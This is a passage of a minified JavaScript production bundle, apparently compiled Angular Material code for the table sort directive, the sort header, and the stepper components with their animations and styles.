J,this.start="asc",this._direction="",this.sortChange=new Tt}get direction(){return this._direction}set direction(e){this._direction=e}get disableClear(){return this._disableClear}set disableClear(e){this._disableClear=wi(e)}register(e){this.sortables.set(e.id,e)}deregister(e){this.sortables.delete(e.id)}sort(e){this.active!=e.id?(this.active=e.id,this.direction=e.start?e.start:this.start):this.direction=this.getNextSortDirection(e),this.sortChange.emit({active:this.active,direction:this.direction})}getNextSortDirection(e){var i,n,r;if(!e)return"";const c=null!==(n=null!==(i=null==e?void 0:e.disableClear)&&void 0!==i?i:this.disableClear)&&void 0!==n?n:!(null===(r=this._defaultOptions)||void 0===r||!r.disableClear);let d=function OCe(t,a){let e=["asc","desc"];return"desc"==t&&e.reverse(),a||e.push(""),e}(e.start||this.start,c),T=d.indexOf(this.direction)+1;return T>=d.length&&(T=0),d[T]}ngOnInit(){this._markInitialized()}ngOnChanges(){this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}}return t.\u0275fac=function(e){return new(e||t)(Ee(FV,8))},t.\u0275dir=Ot({type:t,selectors:[["","matSort",""]],hostAttrs:[1,"mat-sort"],inputs:{disabled:["matSortDisabled","disabled"],active:["matSortActive","active"],start:["matSortStart","start"],direction:["matSortDirection","direction"],disableClear:["matSortDisableClear","disableClear"]},outputs:{sortChange:"matSortChange"},exportAs:["matSort"],features:[ci,sa]}),t})();const yp=Rpe.ENTERING+" "+Ipe.STANDARD_CURVE,U1={indicator:nr("indicator",[sn("active-asc, asc",zi({transform:"translateY(0px)"})),sn("active-desc, desc",zi({transform:"translateY(10px)"})),gn("active-asc <=> active-desc",En(yp))]),leftPointer:nr("leftPointer",[sn("active-asc, asc",zi({transform:"rotate(-45deg)"})),sn("active-desc, desc",zi({transform:"rotate(45deg)"})),gn("active-asc <=> active-desc",En(yp))]),rightPointer:nr("rightPointer",[sn("active-asc, asc",zi({transform:"rotate(45deg)"})),sn("active-desc, desc",zi({transform:"rotate(-45deg)"})),gn("active-asc <=> active-desc",En(yp))]),arrowOpacity:nr("arrowOpacity",[sn("desc-to-active, asc-to-active, active",zi({opacity:1})),sn("desc-to-hint, asc-to-hint, hint",zi({opacity:.54})),sn("hint-to-desc, active-to-desc, desc, hint-to-asc, active-to-asc, asc, void",zi({opacity:0})),gn("* => asc, * => desc, * => active, * => hint, * => void",En("0ms")),gn("* <=> *",En(yp))]),arrowPosition:nr("arrowPosition",[gn("* => desc-to-hint, * => desc-to-active",En(yp,ng([zi({transform:"translateY(-25%)"}),zi({transform:"translateY(0)"})]))),gn("* => hint-to-desc, * => active-to-desc",En(yp,ng([zi({transform:"translateY(0)"}),zi({transform:"translateY(25%)"})]))),gn("* => asc-to-hint, * => asc-to-active",En(yp,ng([zi({transform:"translateY(25%)"}),zi({transform:"translateY(0)"})]))),gn("* => hint-to-asc, * => active-to-asc",En(yp,ng([zi({transform:"translateY(0)"}),zi({transform:"translateY(-25%)"})]))),sn("desc-to-hint, asc-to-hint, hint, desc-to-active, asc-to-active, active",zi({transform:"translateY(0)"})),sn("hint-to-desc, active-to-desc, desc",zi({transform:"translateY(-25%)"})),sn("hint-to-asc, active-to-asc, asc",zi({transform:"translateY(25%)"}))]),allowChildren:nr("allowChildren",[gn("* <=> *",[c4("@*",s4(),{optional:!0})])])};let dA=(()=>{class t{constructor(){this.changes=new J}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const LCe={provide:dA,deps:[[new Cc,new Vc,dA]],useFactory:function NCe(t){return t||new dA}},zCe=Zc(class{});let bp=(()=>{class t extends zCe{constructor(e,i,n,r,c,d,T,k){super(),this._intl=e,this._changeDetectorRef=i,this._sort=n,this._columnDef=r,this._focusMonitor=c,this._elementRef=d,this._ariaDescriber=T,this._showIndicatorHint=!1,this._viewState={},this._arrowDirection="",this._disableViewStateAnimation=!1,this.arrowPosition="after",this._sortActionDescription="Sort",null!=k&&k.arrowPosition&&(this.arrowPosition=null==k?void 0:k.arrowPosition),this._handleStateChanges()}get sortActionDescription(){return this._sortActionDescription}set sortActionDescription(e){this._updateSortActionDescription(e)}get disableClear(){return this._disableClear}set disableClear(e){this._disableClear=wi(e)}ngOnInit(){!this.id&&this._columnDef&&(this.id=this._columnDef.name),this._updateArrowDirection(),this._setAnimationTransitionState({toState:this._isSorted()?"active":this._arrowDirection}),this._sort.register(this),this._sortButton=this._elementRef.nativeElement.querySelector(".mat-sort-header-container"),this._updateSortActionDescription(this._sortActionDescription)}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{const i=!!e;i!==this._showIndicatorHint&&(this._setIndicatorHintVisible(i),this._changeDetectorRef.markForCheck())})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._sort.deregister(this),this._rerenderSubscription.unsubscribe()}_setIndicatorHintVisible(e){this._isDisabled()&&e||(this._showIndicatorHint=e,this._isSorted()||(this._updateArrowDirection(),this._setAnimationTransitionState(this._showIndicatorHint?{fromState:this._arrowDirection,toState:"hint"}:{fromState:"hint",toState:this._arrowDirection})))}_setAnimationTransitionState(e){this._viewState=e||{},this._disableViewStateAnimation&&(this._viewState={toState:e.toState})}_toggleOnInteraction(){this._sort.sort(this),("hint"===this._viewState.toState||"active"===this._viewState.toState)&&(this._disableViewStateAnimation=!0)}_handleClick(){this._isDisabled()||this._sort.sort(this)}_handleKeydown(e){!this._isDisabled()&&(32===e.keyCode||13===e.keyCode)&&(e.preventDefault(),this._toggleOnInteraction())}_isSorted(){return this._sort.active==this.id&&("asc"===this._sort.direction||"desc"===this._sort.direction)}_getArrowDirectionState(){return`${this._isSorted()?"active-":""}${this._arrowDirection}`}_getArrowViewState(){const e=this._viewState.fromState;return(e?`${e}-to-`:"")+this._viewState.toState}_updateArrowDirection(){this._arrowDirection=this._isSorted()?this._sort.direction:this.start||this._sort.start}_isDisabled(){return this._sort.disabled||this.disabled}_getAriaSortAttribute(){return this._isSorted()?"asc"==this._sort.direction?"ascending":"descending":"none"}_renderArrow(){return!this._isDisabled()||this._isSorted()}_updateSortActionDescription(e){var i,n;this._sortButton&&(null===(i=this._ariaDescriber)||void 0===i||i.removeDescription(this._sortButton,this._sortActionDescription),null===(n=this._ariaDescriber)||void 0===n||n.describe(this._sortButton,e)),this._sortActionDescription=e}_handleStateChanges(){this._rerenderSubscription=ra(this._sort.sortChange,this._sort._stateChanges,this._intl.changes).subscribe(()=>{this._isSorted()&&(this._updateArrowDirection(),("hint"===this._viewState.toState||"active"===this._viewState.toState)&&(this._disableViewStateAnimation=!0),this._setAnimationTransitionState({fromState:this._arrowDirection,toState:"active"}),this._showIndicatorHint=!1),!this._isSorted()&&this._viewState&&"active"===this._viewState.toState&&(this._disableViewStateAnimation=!1,this._setAnimationTransitionState({fromState:"active",toState:this._arrowDirection})),this._changeDetectorRef.markForCheck()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(dA),Ee(Ma),Ee(al,8),Ee("MAT_SORT_HEADER_COLUMN_DEF",8),Ee(js),Ee(mi),Ee(Pw,8),Ee(FV,8))},t.\u0275cmp=Wt({type:t,selectors:[["","mat-sort-header",""]],hostAttrs:[1,"mat-sort-header"],hostVars:3,hostBindings:function(e,i){1&e&&he("click",function(){return i._handleClick()})("keydown",function(r){return i._handleKeydown(r)})("mouseenter",function(){return i._setIndicatorHintVisible(!0)})("mouseleave",function(){return i._setIndicatorHintVisible(!1)}),2&e&&(Rt("aria-sort",i._getAriaSortAttribute()),Ct("mat-sort-header-disabled",i._isDisabled()))},inputs:{disabled:"disabled",id:["mat-sort-header","id"],arrowPosition:"arrowPosition",start:"start",sortActionDescription:"sortActionDescription",disableClear:"disableClear"},exportAs:["matSortHeader"],features:[ci],attrs:RCe,ngContentSelectors:kCe,decls:4,vars:7,consts:[[1,"mat-sort-header-container","mat-focus-indicator"],[1,"mat-sort-header-content"],["class","mat-sort-header-arrow",4,"ngIf"],[1,"mat-sort-header-arrow"],[1,"mat-sort-header-stem"],[1,"mat-sort-header-indicator"],[1,"mat-sort-header-pointer-left"],[1,"mat-sort-header-pointer-right"],[1,"mat-sort-header-pointer-middle"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0)(1,"div",1),va(2),u(),ne(3,SCe,6,6,"div",2),u()),2&e&&(Ct("mat-sort-header-sorted",i._isSorted())("mat-sort-header-position-before","before"===i.arrowPosition),Rt("tabindex",i._isDisabled()?null:0)("role",i._isDisabled()?null:"button"),C(3),V("ngIf",i._renderArrow()))},dependencies:[Ri],styles:[".mat-sort-header-container{display:flex;cursor:pointer;align-items:center;letter-spacing:normal;outline:0}[mat-sort-header].cdk-keyboard-focused .mat-sort-header-container,[mat-sort-header].cdk-program-focused .mat-sort-header-container{border-bottom:solid 1px currentColor}.mat-sort-header-disabled .mat-sort-header-container{cursor:default}.mat-sort-header-container::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-sort-header-content{text-align:center;display:flex;align-items:center}.mat-sort-header-position-before{flex-direction:row-reverse}.mat-sort-header-arrow{height:12px;width:12px;min-width:12px;position:relative;display:flex;opacity:0}.mat-sort-header-arrow,[dir=rtl] .mat-sort-header-position-before .mat-sort-header-arrow{margin:0 0 0 6px}.mat-sort-header-position-before .mat-sort-header-arrow,[dir=rtl] .mat-sort-header-arrow{margin:0 6px 0 0}.mat-sort-header-stem{background:currentColor;height:10px;width:2px;margin:auto;display:flex;align-items:center}.cdk-high-contrast-active .mat-sort-header-stem{width:0;border-left:solid 2px}.mat-sort-header-indicator{width:100%;height:2px;display:flex;align-items:center;position:absolute;top:0;left:0}.mat-sort-header-pointer-middle{margin:auto;height:2px;width:2px;background:currentColor;transform:rotate(45deg)}.cdk-high-contrast-active .mat-sort-header-pointer-middle{width:0;height:0;border-top:solid 2px;border-left:solid 2px}.mat-sort-header-pointer-left,.mat-sort-header-pointer-right{background:currentColor;width:6px;height:2px;position:absolute;top:0}.cdk-high-contrast-active .mat-sort-header-pointer-left,.cdk-high-contrast-active .mat-sort-header-pointer-right{width:0;height:0;border-left:solid 6px;border-top:solid 2px}.mat-sort-header-pointer-left{transform-origin:right;left:0}.mat-sort-header-pointer-right{transform-origin:left;right:0}"],encapsulation:2,data:{animation:[U1.indicator,U1.leftPointer,U1.rightPointer,U1.arrowOpacity,U1.arrowPosition,U1.allowChildren]},changeDetection:0}),t})(),VV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[LCe],imports:[rn,la]}),t})();function WCe(t,a){1&t&&va(0)}const FCe=["*"];let BV=(()=>{class t{constructor(e){this._elementRef=e}focus(){this._elementRef.nativeElement.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepHeader",""]],hostAttrs:["role","tab"]}),t})(),HV=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepLabel",""]]}),t})(),VCe=0;const UV=new ni("STEPPER_GLOBAL_OPTIONS");let D8=(()=>{class t{constructor(e,i){this._stepper=e,this.interacted=!1,this.interactedStream=new Tt,this._editable=!0,this._optional=!1,this._completedOverride=null,this._customError=null,this._stepperOptions=i||{},this._displayDefaultIndicatorType=!1!==this._stepperOptions.displayDefaultIndicatorType}get editable(){return this._editable}set editable(e){this._editable=wi(e)}get optional(){return this._optional}set optional(e){this._optional=wi(e)}get completed(){return null==this._completedOverride?this._getDefaultCompleted():this._completedOverride}set completed(e){this._completedOverride=wi(e)}_getDefaultCompleted(){return this.stepControl?this.stepControl.valid&&this.interacted:this.interacted}get hasError(){return null==this._customError?this._getDefaultError():this._customError}set hasError(e){this._customError=wi(e)}_getDefaultError(){return this.stepControl&&this.stepControl.invalid&&this.interacted}select(){this._stepper.selected=this}reset(){this.interacted=!1,null!=this._completedOverride&&(this._completedOverride=!1),null!=this._customError&&(this._customError=!1),this.stepControl&&this.stepControl.reset()}ngOnChanges(){this._stepper._stateChanged()}_markAsInteracted(){this.interacted||(this.interacted=!0,this.interactedStream.emit(this))}_showError(){var e;return null!==(e=this._stepperOptions.showError)&&void 0!==e?e:null!=this._customError}}return t.\u0275fac=function(e){return new(e||t)(Ee(ja(()=>ub)),Ee(UV,8))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-step"]],contentQueries:function(e,i,n){if(1&e&&fa(n,HV,5),2&e){let r;Vt(r=Bt())&&(i.stepLabel=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(ho,7),2&e){let n;Vt(n=Bt())&&(i.content=n.first)}},inputs:{stepControl:"stepControl",label:"label",errorMessage:"errorMessage",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],state:"state",editable:"editable",optional:"optional",completed:"completed",hasError:"hasError"},outputs:{interactedStream:"interacted"},exportAs:["cdkStep"],features:[sa],ngContentSelectors:FCe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),ne(0,WCe,1,0,"ng-template"))},encapsulation:2,changeDetection:0}),t})(),ub=(()=>{class t{constructor(e,i,n){this._dir=e,this._changeDetectorRef=i,this._elementRef=n,this._destroyed=new J,this.steps=new Cd,this._sortedHeaders=new Cd,this._linear=!1,this._selectedIndex=0,this.selectionChange=new Tt,this._orientation="horizontal",this._groupId=VCe++}get linear(){return this._linear}set linear(e){this._linear=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){var i;const n=Uo(e);this.steps&&this._steps?(this._isValidIndex(n),null===(i=this.selected)||void 0===i||i._markAsInteracted(),this._selectedIndex!==n&&!this._anyControlsInvalidOrPending(n)&&(n>=this._selectedIndex||this.steps.toArray()[n].editable)&&this._updateSelectedItemIndex(n)):this._selectedIndex=n}get selected(){return this.steps?this.steps.toArray()[this.selectedIndex]:void 0}set selected(e){this.selectedIndex=e&&this.steps?this.steps.toArray().indexOf(e):-1}get orientation(){return this._orientation}set orientation(e){this._orientation=e,this._keyManager&&this._keyManager.withVerticalOrientation("vertical"===e)}ngAfterContentInit(){this._steps.changes.pipe(Ro(this._steps),ea(this._destroyed)).subscribe(e=>{this.steps.reset(e.filter(i=>i._stepper===this)),this.steps.notifyOnChanges()})}ngAfterViewInit(){this._stepHeader.changes.pipe(Ro(this._stepHeader),ea(this._destroyed)).subscribe(e=>{this._sortedHeaders.reset(e.toArray().sort((i,n)=>i._elementRef.nativeElement.compareDocumentPosition(n._elementRef.nativeElement)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1)),this._sortedHeaders.notifyOnChanges()}),this._keyManager=new L1(this._sortedHeaders).withWrap().withHomeAndEnd().withVerticalOrientation("vertical"===this._orientation),(this._dir?this._dir.change:Bi()).pipe(Ro(this._layoutDirection()),ea(this._destroyed)).subscribe(e=>this._keyManager.withHorizontalOrientation(e)),this._keyManager.updateActiveItem(this._selectedIndex),this.steps.changes.subscribe(()=>{this.selected||(this._selectedIndex=Math.max(this._selectedIndex-1,0))}),this._isValidIndex(this._selectedIndex)||(this._selectedIndex=0)}ngOnDestroy(){this.steps.destroy(),this._sortedHeaders.destroy(),this._destroyed.next(),this._destroyed.complete()}next(){this.selectedIndex=Math.min(this._selectedIndex+1,this.steps.length-1)}previous(){this.selectedIndex=Math.max(this._selectedIndex-1,0)}reset(){this._updateSelectedItemIndex(0),this.steps.forEach(e=>e.reset()),this._stateChanged()}_getStepLabelId(e){return`cdk-step-label-${this._groupId}-${e}`}_getStepContentId(e){return`cdk-step-content-${this._groupId}-${e}`}_stateChanged(){this._changeDetectorRef.markForCheck()}_getAnimationDirection(e){const i=e-this._selectedIndex;return i<0?"rtl"===this._layoutDirection()?"next":"previous":i>0?"rtl"===this._layoutDirection()?"previous":"next":"current"}_getIndicatorType(e,i="number"){const n=this.steps.toArray()[e],r=this._isCurrentStep(e);return n._displayDefaultIndicatorType?this._getDefaultIndicatorLogic(n,r):this._getGuidelineLogic(n,r,i)}_getDefaultIndicatorLogic(e,i){return e._showError()&&e.hasError&&!i?"error":!e.completed||i?"number":e.editable?"edit":"done"}_getGuidelineLogic(e,i,n="number"){return e._showError()&&e.hasError&&!i?"error":e.completed&&!i?"done":e.completed&&i?n:e.editable&&i?"edit":n}_isCurrentStep(e){return this._selectedIndex===e}_getFocusIndex(){return this._keyManager?this._keyManager.activeItemIndex:this._selectedIndex}_updateSelectedItemIndex(e){const i=this.steps.toArray();this.selectionChange.emit({selectedIndex:e,previouslySelectedIndex:this._selectedIndex,selectedStep:i[e],previouslySelectedStep:i[this._selectedIndex]}),this._containsFocus()?this._keyManager.setActiveItem(e):this._keyManager.updateActiveItem(e),this._selectedIndex=e,this._stateChanged()}_onKeydown(e){const i=es(e),n=e.keyCode,r=this._keyManager;null==r.activeItemIndex||i||32!==n&&13!==n?r.onKeydown(e):(this.selectedIndex=r.activeItemIndex,e.preventDefault())}_anyControlsInvalidOrPending(e){return!!(this._linear&&e>=0)&&this.steps.toArray().slice(0,e).some(i=>{const n=i.stepControl;return(n?n.invalid||n.pending||!i.interacted:!i.completed)&&!i.optional&&!i._completedOverride})}_layoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_containsFocus(){const e=this._elementRef.nativeElement,i=g3();return e===i||e.contains(i)}_isValidIndex(e){return e>-1&&(!this.steps||e<this.steps.length)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(Ma),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkStepper",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,D8,5),fa(n,BV,5)),2&e){let r;Vt(r=Bt())&&(i._steps=r),Vt(r=Bt())&&(i._stepHeader=r)}},inputs:{linear:"linear",selectedIndex:"selectedIndex",selected:"selected",orientation:"orientation"},outputs:{selectionChange:"selectionChange"},exportAs:["cdkStepper"]}),t})(),BCe=(()=>{class t{constructor(e){this._stepper=e,this.type="submit"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ub))},t.\u0275dir=Ot({type:t,selectors:[["button","cdkStepperNext",""]],hostVars:1,hostBindings:function(e,i){1&e&&he("click",function(){return i._stepper.next()}),2&e&&Gs("type",i.type)},inputs:{type:"type"}}),t})(),HCe=(()=>{class t{constructor(e){this._stepper=e,this.type="button"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ub))},t.\u0275dir=Ot({type:t,selectors:[["button","cdkStepperPrevious",""]],hostVars:1,hostBindings:function(e,i){1&e&&he("click",function(){return i._stepper.previous()}),2&e&&Gs("type",i.type)},inputs:{type:"type"}}),t})(),UCe=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1]}),t})();function qCe(t,a){if(1&t&&Ir(0,8),2&t){const e=B();V("ngTemplateOutlet",e.iconOverrides[e.state])("ngTemplateOutletContext",e._getIconContext())}}function GCe(t,a){if(1&t&&(m(0,"span",13),s(1),u()),2&t){const e=B(2);C(1),ke(e._getDefaultTextForState(e.state))}}function jCe(t,a){if(1&t&&(m(0,"span",14),s(1),u()),2&t){const e=B(2);C(1),ke(e._intl.completedLabel)}}function QCe(t,a){if(1&t&&(m(0,"span",14),s(1),u()),2&t){const e=B(2);C(1),ke(e._intl.editableLabel)}}function $Ce(t,a){if(1&t&&(m(0,"mat-icon",13),s(1),u()),2&t){const e=B(2);C(1),ke(e._getDefaultTextForState(e.state))}}function KCe(t,a){if(1&t&&(bt(0,9),ne(1,GCe,2,1,"span",10),ne(2,jCe,2,1,"span",11),ne(3,QCe,2,1,"span",11),ne(4,$Ce,2,1,"mat-icon",12),Mt()),2&t){const e=B();V("ngSwitch",e.state),C(1),V("ngSwitchCase","number"),C(1),V("ngIf","done"===e.state),C(1),V("ngIf","edit"===e.state)}}function XCe(t,a){if(1&t&&(m(0,"div",15),Ir(1,16),u()),2&t){const e=B();C(1),V("ngTemplateOutlet",e._templateLabel().template)}}function YCe(t,a){if(1&t&&(m(0,"div",15),s(1),u()),2&t){const e=B();C(1),ke(e.label)}}function JCe(t,a){if(1&t&&(m(0,"div",17),s(1),u()),2&t){const e=B();C(1),ke(e._intl.optionalLabel)}}function ZCe(t,a){if(1&t&&(m(0,"div",18),s(1),u()),2&t){const e=B();C(1),ke(e.errorMessage)}}function eye(t,a){}function tye(t,a){if(1&t&&(va(0),ne(1,eye,0,0,"ng-template",0)),2&t){const e=B();C(1),V("cdkPortalOutlet",e._portal)}}const iye=["*"];function aye(t,a){1&t&&it(0,"div",11)}const qV=function(t,a){return{step:t,i:a}};function nye(t,a){if(1&t&&(bt(0),Ir(1,9),ne(2,aye,1,0,"div",10),Mt()),2&t){const e=a.$implicit,i=a.index,n=a.last;B(2);const r=Ti(4);C(1),V("ngTemplateOutlet",r)("ngTemplateOutletContext",Ah(3,qV,e,i)),C(1),V("ngIf",!n)}}const GV=function(t){return{animationDuration:t}},jV=function(t,a){return{value:t,params:a}};function oye(t,a){if(1&t){const e=Ye();m(0,"div",12),he("@horizontalStepTransition.done",function(n){return be(e),Me(B(2)._animationDone.next(n))}),Ir(1,13),u()}if(2&t){const e=a.$implicit,i=a.index,n=B(2);Ct("mat-horizontal-stepper-content-inactive",n.selectedIndex!==i),V("@horizontalStepTransition",Ah(8,jV,n._getAnimationDirection(i),fr(6,GV,n._getAnimationDuration())))("id",n._getStepContentId(i)),Rt("aria-labelledby",n._getStepLabelId(i)),C(1),V("ngTemplateOutlet",e.content)}}function rye(t,a){if(1&t&&(m(0,"div",4)(1,"div",5),ne(2,nye,3,6,"ng-container",6),u(),m(3,"div",7),ne(4,oye,2,11,"div",8),u()()),2&t){const e=B();C(2),V("ngForOf",e.steps),C(2),V("ngForOf",e.steps)}}function sye(t,a){if(1&t){const e=Ye();m(0,"div",15),Ir(1,9),m(2,"div",16)(3,"div",17),he("@verticalStepTransition.done",function(n){return be(e),Me(B(2)._animationDone.next(n))}),m(4,"div",18),Ir(5,13),u()()()()}if(2&t){const e=a.$implicit,i=a.index,n=a.last,r=B(2),c=Ti(4);C(1),V("ngTemplateOutlet",c)("ngTemplateOutletContext",Ah(10,qV,e,i)),C(1),Ct("mat-stepper-vertical-line",!n),C(1),Ct("mat-vertical-stepper-content-inactive",r.selectedIndex!==i),V("@verticalStepTransition",Ah(15,jV,r._getAnimationDirection(i),fr(13,GV,r._getAnimationDuration())))("id",r._getStepContentId(i)),Rt("aria-labelledby",r._getStepLabelId(i)),C(2),V("ngTemplateOutlet",e.content)}}function cye(t,a){if(1&t&&(bt(0),ne(1,sye,6,18,"div",14),Mt()),2&t){const e=B();C(1),V("ngForOf",e.steps)}}function lye(t,a){if(1&t){const e=Ye();m(0,"mat-step-header",19),he("click",function(){return Me(be(e).step.select())})("keydown",function(n){return be(e),Me(B()._onKeydown(n))}),u()}if(2&t){const e=a.step,i=a.i,n=B();Ct("mat-horizontal-stepper-header","horizontal"===n.orientation)("mat-vertical-stepper-header","vertical"===n.orientation),V("tabIndex",n._getFocusIndex()===i?0:-1)("id",n._getStepLabelId(i))("index",i)("state",n._getIndicatorType(i,e.state))("label",e.stepLabel||e.label)("selected",n.selectedIndex===i)("active",n._stepIsNavigable(i,e))("optional",e.optional)("errorMessage",e.errorMessage)("iconOverrides",n._iconOverrides)("disableRipple",n.disableRipple||!n._stepIsNavigable(i,e))("color",e.color||n.color),Rt("aria-posinset",i+1)("aria-setsize",n.steps.length)("aria-controls",n._getStepContentId(i))("aria-selected",n.selectedIndex==i)("aria-label",e.ariaLabel||null)("aria-labelledby",!e.ariaLabel&&e.ariaLabelledby?e.ariaLabelledby:null)("aria-disabled",!n._stepIsNavigable(i,e)||null)}}let mA=(()=>{class t extends HV{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matStepLabel",""]],features:[ci]}),t})(),uA=(()=>{class t{constructor(){this.changes=new J,this.optionalLabel="Optional",this.completedLabel="Completed",this.editableLabel="Editable"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const mye={provide:uA,deps:[[new Cc,new Vc,uA]],useFactory:function dye(t){return t||new uA}},uye=Pd(class extends BV{constructor(a){super(a)}},"primary");let QV=(()=>{class t extends uye{constructor(e,i,n,r){super(n),this._intl=e,this._focusMonitor=i,this._intlSubscription=e.changes.subscribe(()=>r.markForCheck())}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){this._intlSubscription.unsubscribe(),this._focusMonitor.stopMonitoring(this._elementRef)}focus(e,i){e?this._focusMonitor.focusVia(this._elementRef,e,i):this._elementRef.nativeElement.focus(i)}_stringLabel(){return this.label instanceof mA?null:this.label}_templateLabel(){return this.label instanceof mA?this.label:null}_getHostElement(){return this._elementRef.nativeElement}_getIconContext(){return{index:this.index,active:this.active,optional:this.optional}}_getDefaultTextForState(e){return"number"==e?`${this.index+1}`:"edit"==e?"create":"error"==e?"warning":e}}return t.\u0275fac=function(e){return new(e||t)(Ee(uA),Ee(js),Ee(mi),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-step-header"]],hostAttrs:["role","tab",1,"mat-step-header"],inputs:{color:"color",state:"state",label:"label",errorMessage:"errorMessage",iconOverrides:"iconOverrides",index:"index",selected:"selected",active:"active",optional:"optional",disableRipple:"disableRipple"},features:[ci],decls:10,vars:19,consts:[["matRipple","",1,"mat-step-header-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-step-icon-content",3,"ngSwitch"],[3,"ngTemplateOutlet","ngTemplateOutletContext",4,"ngSwitchCase"],[3,"ngSwitch",4,"ngSwitchDefault"],[1,"mat-step-label"],["class","mat-step-text-label",4,"ngIf"],["class","mat-step-optional",4,"ngIf"],["class","mat-step-sub-label-error",4,"ngIf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[3,"ngSwitch"],["aria-hidden","true",4,"ngSwitchCase"],["class","cdk-visually-hidden",4,"ngIf"],["aria-hidden","true",4,"ngSwitchDefault"],["aria-hidden","true"],[1,"cdk-visually-hidden"],[1,"mat-step-text-label"],[3,"ngTemplateOutlet"],[1,"mat-step-optional"],[1,"mat-step-sub-label-error"]],template:function(e,i){1&e&&(it(0,"div",0),m(1,"div")(2,"div",1),ne(3,qCe,1,2,"ng-container",2),ne(4,KCe,5,4,"ng-container",3),u()(),m(5,"div",4),ne(6,XCe,2,1,"div",5),ne(7,YCe,2,1,"div",5),ne(8,JCe,2,1,"div",6),ne(9,ZCe,2,1,"div",7),u()),2&e&&(V("matRippleTrigger",i._getHostElement())("matRippleDisabled",i.disableRipple),C(1),Dv("mat-step-icon-state-",i.state," mat-step-icon"),Ct("mat-step-icon-selected",i.selected),C(1),V("ngSwitch",!(!i.iconOverrides||!i.iconOverrides[i.state])),C(1),V("ngSwitchCase",!0),C(2),Ct("mat-step-label-active",i.active)("mat-step-label-selected",i.selected)("mat-step-label-error","error"==i.state),C(1),V("ngIf",i._templateLabel()),C(1),V("ngIf",i._stringLabel()),C(1),V("ngIf",i.optional&&"error"!=i.state),C(1),V("ngIf","error"==i.state))},dependencies:[Ri,_1,Jf,p1,d6,oa,Dl],styles:['.mat-step-header{overflow:hidden;outline:none;cursor:pointer;position:relative;box-sizing:content-box;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-step-header:focus .mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-step-header{outline:solid 1px}.cdk-high-contrast-active .mat-step-header[aria-selected=true] .mat-step-label{text-decoration:underline}.mat-step-optional,.mat-step-sub-label-error{font-size:12px}.mat-step-icon{border-radius:50%;height:24px;width:24px;flex-shrink:0;position:relative}.mat-step-icon-content{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);display:flex}.mat-step-icon .mat-icon{font-size:16px;height:16px;width:16px}.mat-step-icon-state-error .mat-icon{font-size:24px;height:24px;width:24px}.mat-step-label{display:inline-block;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;min-width:50px;vertical-align:middle}.mat-step-text-label{text-overflow:ellipsis;overflow:hidden}.mat-step-header .mat-step-header-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}'],encapsulation:2,changeDetection:0}),t})();const XV={horizontalStepTransition:nr("horizontalStepTransition",[sn("previous",zi({transform:"translate3d(-100%, 0, 0)",visibility:"hidden"})),sn("current",zi({transform:"none",visibility:"inherit"})),sn("next",zi({transform:"translate3d(100%, 0, 0)",visibility:"hidden"})),gn("* => *",En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)"),{params:{animationDuration:"500ms"}})]),verticalStepTransition:nr("verticalStepTransition",[sn("previous",zi({height:"0px",visibility:"hidden"})),sn("next",zi({height:"0px",visibility:"hidden"})),sn("current",zi({height:"*",visibility:"inherit"})),gn("* <=> current",En("{{animationDuration}} cubic-bezier(0.4, 0.0, 0.2, 1)"),{params:{animationDuration:"225ms"}})])};let hye=(()=>{class t{constructor(e){this.templateRef=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matStepperIcon",""]],inputs:{name:["matStepperIcon","name"]}}),t})(),fye=(()=>{class t{constructor(e){this._template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matStepContent",""]]}),t})(),YV=(()=>{class t extends 